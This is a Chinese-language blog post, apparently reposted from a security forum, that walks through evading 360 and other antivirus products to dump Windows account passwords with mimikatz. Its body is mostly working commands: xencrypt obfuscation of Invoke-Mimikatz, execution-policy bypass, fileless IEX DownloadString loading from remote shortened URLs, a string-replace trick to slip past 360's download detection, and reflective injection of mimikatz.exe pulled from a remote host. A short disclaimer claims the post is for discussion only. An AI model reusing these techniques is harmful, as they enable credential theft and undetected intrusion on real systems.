实战中如何绕过杀软用mimikatz获取账号密码

栏目: IT技术 · 发布时间: 3年前

内容简介:mimikatz的exe,powershell版(可上github下载)网上版本已经被360已及各种杀软杀的死死的,扔上去就挂

*严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。

目标机system权限,安装了360,准备获取密码。

mimikatz的exe,powershell版(可上github下载)网上版本已经被360已及各种杀软杀的死死的,扔上去就挂

实战中如何绕过杀软用mimikatz获取账号密码

所以采用混淆加密方式来绕过杀软,混淆脚本地址如下

https://github.com/the-xentropy/xencrypt

使用AES加密和Gzip / DEFLATE压缩,每次调用都会生成一个唯一但是功能相同的脚本。它通过压缩和加密输入脚本并将此数据作为有效载荷存储在新脚本中来实现免杀,输出脚本将在运行有效载荷之前对其进行解密和解压缩。

使用方法

Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1-OutFile xenmimi.ps1

实战中如何绕过杀软用mimikatz获取账号密码

还可以通过-Iterations标志支持递归分层。

Invoke-Xencrypt -InFile invoke-mimikatz.ps1-OutFile xenmimi.ps1 -Iterations 100

可过360等大部分杀软,但卡巴斯基被杀,已经可以达成目标了。

实战中如何绕过杀软用mimikatz获取账号密码

在win10运行,成功获取账号密码:

实战中如何绕过杀软用mimikatz获取账号密码

扔到Win7上试试,出现报错

实战中如何绕过杀软用mimikatz获取账号密码

因为win7powershell版本为2.0

实战中如何绕过杀软用mimikatz获取账号密码

混淆脚本采用AES加密和Gzip / DEFLATE压缩,含有powershell2.0版本不支持调用的方法。难搞哦。要想办法过w7+360,可采用powershell方式绕过

可在cmd下执行

powershell -exec bypass "import-module.\Invoke-Mimikatz.ps1;Invoke-Mimikatz

因目标安装360,未混淆文件传上去就会被杀并弹窗,所以采用远程加载方法绕过,远程加载方法会在内存中运行mimikatz,无文件落地由此来绕过杀软

powershell "IEX (New-ObjectNet.WebClient).DownloadString(' http://is.gd/oeoFuI '); Invoke-Mimikatz-DumpCreds"

实战中如何绕过杀软用mimikatz获取账号密码

被360判断为PowerShell下载攻击并弹窗,360针对powershell的http协议下载查杀,但是检查内容只是命令中出现http,所以只需要一步简单的替换即可绕过(‘htxtp://is.gd/oeoFuI’ -replace ‘x’,”)

(这里有个坑。360这个zz,在判断PowerShell下载攻击后,接下来一段时间会直接对powershell拒绝访问,实战直接执行下面的命令)

powershell "IEX (New-ObjectNet.WebClient).DownloadString(('htxtp://is.gd/oeoFuI' -replace 'x',''));Invoke-Mimikatz -DumpCreds"

实战中如何绕过杀软用mimikatz获取账号密码

即可绕过360获取目标账号密码。

既然可以远程加载powershell绕过杀软,那远程加载exe也同样可以,powershell加载exe进内存运行需要PowerSploit中的Invoke-ReflectivePEInjection脚本,地址如下

https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-ReflectivePEInjection/Invoke-ReflectivePEInjection.ps1

我们远程加载Invoke-ReflectivePEInjection再远程加载调用mimikatz.exe进内存以无文件落地方式绕过杀软读取账号密码(绕过PowerShell下载攻击弹窗方式同上),命令如下

powershell.exe -exec bypass IEX (New-ObjectNet.WebClient).DownloadString(('htxtp://suo.im/5FAjaC' -replace'x',''));Invoke-ReflectivePEInjection -PEUrl<a href="http://x.x.x.x/mimikatz.exe-ExeArgs">http://x.x.x.x/mimikatz.exe-ExeArgs</a>"sekurlsa::logonpasswords" -ForceASLR
-PEUrl :包含要加载和执行的DLL / EXE的URL
-ExeArgs :所要执行命令

实战中如何绕过杀软用mimikatz获取账号密码


以上所述就是小编给大家介绍的《实战中如何绕过杀软用mimikatz获取账号密码》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Google成功的七堂课

Google成功的七堂课

罗耀宗 / 电子工业出版社 / 2005-7 / 28.00元

Google是全球使用人数最多的搜索引擎,在短短几年内,Google从斯坦福大学的实验室,茁壮成长为举世瞩目的IT业超级巨人,他们的成功绝非偶然,尤其是在网络泡沫破灭,行业一片萧条之际,它的崛起更为IT业带来一缕曙光。作者从趋势观察家的角度,以讲座的形式,向读者讲述Google成功的关键因素:破除因循守旧、不断打破常规,核心技术领先、做出了“更好的捕鼠器”,使得Google在搜索技术方面远远超越对......一起来看看 《Google成功的七堂课》 这本书的介绍吧!

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

html转js在线工具
html转js在线工具

html转js在线工具

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具